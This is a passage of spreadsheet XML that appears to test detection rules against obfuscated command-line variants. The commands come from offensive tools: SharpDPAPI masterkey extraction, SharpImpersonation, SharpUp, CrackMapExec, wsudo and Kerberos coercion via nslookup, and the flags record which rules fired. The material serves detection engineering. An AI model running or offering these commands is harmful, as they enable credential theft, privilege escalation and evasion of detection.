        </is>
      </c>
      <c r="C459" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D459" s="41" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E459" s="41" t="inlineStr">
        <is>
          <t>wsudo -u System  --</t>
        </is>
      </c>
      <c r="F459" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G459" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H459" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I459" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J459" s="41" t="n"/>
      <c r="K459" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="460" ht="15.75" customHeight="1" s="42">
      <c r="A460" s="41" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B460" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C460" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D460" s="41" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E460" s="41" t="inlineStr">
        <is>
          <t>wsudo --ti</t>
        </is>
      </c>
      <c r="F460" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G460" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H460" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I460" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J460" s="41" t="n"/>
      <c r="K460" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="461" ht="15.75" customHeight="1" s="42">
      <c r="A461" s="41" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B461" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C461" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D461" s="41" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E461" s="41" t="inlineStr">
        <is>
          <t>SharpUp.exe "audit"</t>
        </is>
      </c>
      <c r="F461" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G461" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H461" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I461" s="41" t="n"/>
      <c r="J461" s="41" t="n"/>
      <c r="K461" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="462" ht="15.75" customHeight="1" s="42">
      <c r="A462" s="41" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B462" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C462" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D462" s="41" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E462" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c SharpUp.exe Hijackable^Paths</t>
        </is>
      </c>
      <c r="F462" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G462" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H462" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I462" s="41" t="n"/>
      <c r="J462" s="41" t="n"/>
      <c r="K462" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="463" ht="15.75" customHeight="1" s="42">
      <c r="A463" s="41" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B463" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C463" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D463" s="41" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E463" s="41" t="inlineStr">
        <is>
          <t>SharpUp.exe "Hijackable""Paths"</t>
        </is>
      </c>
      <c r="F463" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G463" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H463" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I463" s="41" t="n"/>
      <c r="J463" s="41" t="n"/>
      <c r="K463" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="464" ht="15.75" customHeight="1" s="42">
      <c r="A464" s="41" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B464" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C464" s="41" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D464" s="41" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E464" s="41" t="inlineStr">
        <is>
          <t>nslookup.exe "UWhRCAAAAABAAAAA"</t>
        </is>
      </c>
      <c r="F464" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G464" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H464" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I464" s="41" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002); Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J464" s="41" t="n"/>
      <c r="K464" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="465" ht="15.75" customHeight="1" s="42">
      <c r="A465" s="41" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B465" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C465" s="41" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D465" s="41" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E465" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c nslookup.exe UWhRC^AAAAABAAAAA</t>
        </is>
      </c>
      <c r="F465" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G465" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H465" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I465" s="41" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J465" s="41" t="n"/>
      <c r="K465" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="466" ht="15.75" customHeight="1" s="42">
      <c r="A466" s="41" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B466" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C466" s="41" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D466" s="41" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E466" s="41" t="inlineStr">
        <is>
          <t>nslookup.exe "UWhRCAAAAA""BAAAAA"</t>
        </is>
      </c>
      <c r="F466" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G466" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H466" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I466" s="41" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002); Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J466" s="41" t="n"/>
      <c r="K466" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="467" ht="15.75" customHeight="1" s="42">
      <c r="A467" s="41" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B467" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C467" s="41" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D467" s="41" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E467" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe	smb	192.0.2.10</t>
        </is>
      </c>
      <c r="F467" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G467" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H467" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I467" s="41" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J467" s="41" t="n"/>
      <c r="K467" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="468" ht="15.75" customHeight="1" s="42">
      <c r="A468" s="41" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B468" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C468" s="41" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D468" s="41" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E468" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe "smb" 192.0.2.10</t>
        </is>
      </c>
      <c r="F468" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G468" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H468" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I468" s="41" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J468" s="41" t="n"/>
      <c r="K468" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="469" ht="15.75" customHeight="1" s="42">
      <c r="A469" s="41" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B469" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C469" s="41" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D469" s="41" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E469" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe smb  192.0.2.10</t>
        </is>
      </c>
      <c r="F469" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G469" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H469" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I469" s="41" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J469" s="41" t="n"/>
      <c r="K469" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="470" ht="15.75" customHeight="1" s="42">
      <c r="A470" s="41" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B470" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C470" s="41" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D470" s="41" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E470" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\crackmapexec.exe sm^b 192.0.2.10</t>
        </is>
      </c>
      <c r="F470" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G470" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H470" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I470" s="41" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J470" s="41" t="n"/>
      <c r="K470" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="471" ht="15.75" customHeight="1" s="42">
      <c r="A471" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B471" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C471" s="41" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D471" s="41" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E471" s="41" t="inlineStr">
        <is>
          <t>impersonate list</t>
        </is>
      </c>
      <c r="F471" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G471" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H471" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I471" s="41" t="n"/>
      <c r="J471" s="41" t="n"/>
      <c r="K471" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="472" ht="15.75" customHeight="1" s="42">
      <c r="A472" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B472" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C472" s="41" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D472" s="41" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E472" s="41" t="inlineStr">
        <is>
          <t>impersonate.exe	list</t>
        </is>
      </c>
      <c r="F472" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G472" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H472" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I472" s="41" t="n"/>
      <c r="J472" s="41" t="n"/>
      <c r="K472" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="473" ht="15.75" customHeight="1" s="42">
      <c r="A473" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B473" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C473" s="41" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D473" s="41" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E473" s="41" t="inlineStr">
        <is>
          <t>impersonate.exe "list"</t>
        </is>
      </c>
      <c r="F473" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G473" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H473" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I473" s="41" t="n"/>
      <c r="J473" s="41" t="n"/>
      <c r="K473" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="474" ht="15.75" customHeight="1" s="42">
      <c r="A474" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B474" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C474" s="41" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D474" s="41" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E474" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c impersonate.exe li^st</t>
        </is>
      </c>
      <c r="F474" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G474" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H474" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I474" s="41" t="n"/>
      <c r="J474" s="41" t="n"/>
      <c r="K474" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="475" ht="15.75" customHeight="1" s="42">
      <c r="A475" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B475" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C475" s="41" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D475" s="41" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E475" s="41" t="inlineStr">
        <is>
          <t>impersonate.exe  list</t>
        </is>
      </c>
      <c r="F475" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G475" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H475" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I475" s="41" t="n"/>
      <c r="J475" s="41" t="n"/>
      <c r="K475" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="476" ht="15.75" customHeight="1" s="42">
      <c r="A476" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B476" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C476" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D476" s="41" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E476" s="41" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe masterkeys -password:Secret123</t>
        </is>
      </c>
      <c r="F476" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G476" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H476" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I476" s="41" t="n"/>
      <c r="J476" s="41" t="n"/>
      <c r="K476" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="477" ht="15.75" customHeight="1" s="42">
      <c r="A477" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B477" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C477" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D477" s="41" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E477" s="41" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe	masterkeys	/password:Secret123</t>
        </is>
      </c>
      <c r="F477" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G477" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H477" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I477" s="41" t="n"/>
      <c r="J477" s="41" t="n"/>
      <c r="K477" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="478" ht="15.75" customHeight="1" s="42">
      <c r="A478" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B478" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C478" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D478" s="41" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E478" s="41" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe "masterkeys" /password:Secret123</t>
        </is>
      </c>
      <c r="F478" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G478" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H478" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I478" s="41" t="n"/>
      <c r="J478" s="41" t="n"/>
      <c r="K478" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="479" ht="15.75" customHeight="1" s="42">
      <c r="A479" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B479" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C479" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D479" s="41" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E479" s="41" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe masterkeys  /password:Secret123</t>
        </is>
      </c>
      <c r="F479" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G479" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H479" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I479" s="41" t="n"/>
      <c r="J479" s="41" t="n"/>
      <c r="K479" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="480" ht="15.75" customHeight="1" s="42">
      <c r="A480" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B480" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C480" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D480" s="41" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E480" s="41" t="inlineStr">
        <is>
          <t>SharpImpersonation.exe "user:Administrator" "binary:C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F480" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G480" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H480" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I480" s="41" t="n"/>
      <c r="J480" s="41" t="n"/>
      <c r="K480" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="481" ht="15.75" customHeight="1" s="42">
      <c r="A481" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B481" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C481" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D481" s="41" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E481" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c SharpImpersonation.exe use^r:Administrator bina^ry:C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F481" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G481" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H481" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I481" s="41" t="n"/>
      <c r="J481" s="41" t="n"/>
      <c r="K481" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="482" ht="15.75" customHeight="1" s="42">
      <c r="A482" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B482" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C482" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D482" s="41" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E482" s="41" t="inlineStr">
        <is>
          <t>SharpImpersonation.exe  user:Administrator  binary:C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F482" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G482" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H482" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I482" s="41" t="n"/>
      <c r="J482" s="41" t="n"/>
      <c r="K482" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="483" ht="15.75" customHeight="1" s="42">
      <c r="A483" s="41" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B483" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C483" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D483" s="41" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E483" s="41" t="inlineStr">
        <is>
          <t>SharpImpersonation.exe technique:"CreateProcessAsUserW"</t>
        </is>
      </c>
      <c r="F483" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G483" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H483" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I483" s="41" t="n"/>
      <c r="J483" s="41" t="n"/>
      <c r="K483" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="484" ht="15.75" customHeight="1" s="42">
      <c r="A484" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B484" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C484" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D484" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E484" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share -USER:domain\user password</t>
        </is>
      </c>
      <c r="F484" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G484" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H484" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I484" s="41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484" s="41" t="n"/>
      <c r="K484" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="485" ht="15.75" customHeight="1" s="42">
      <c r="A485" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B485" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C485" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D485" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E485" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:domain\user password</t>
        </is>
      </c>
      <c r="F485" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G485" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H485" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I485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485" s="41" t="n"/>
      <c r="K485" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="486" ht="15.75" customHeight="1" s="42">
      <c r="A486" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B486" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C486" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D486" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E486" s="41" t="inlineStr">
        <is>
          <t>net use "\192.0.2.10\share" /USER:domain\user password</t>
        </is>
      </c>
      <c r="F486" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G486" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H486" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I486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486" s="41" t="n"/>
      <c r="K486" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="487" ht="15.75" customHeight="1" s="42">
      <c r="A487" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B487" s="41" t="inlineStr">
        <is>
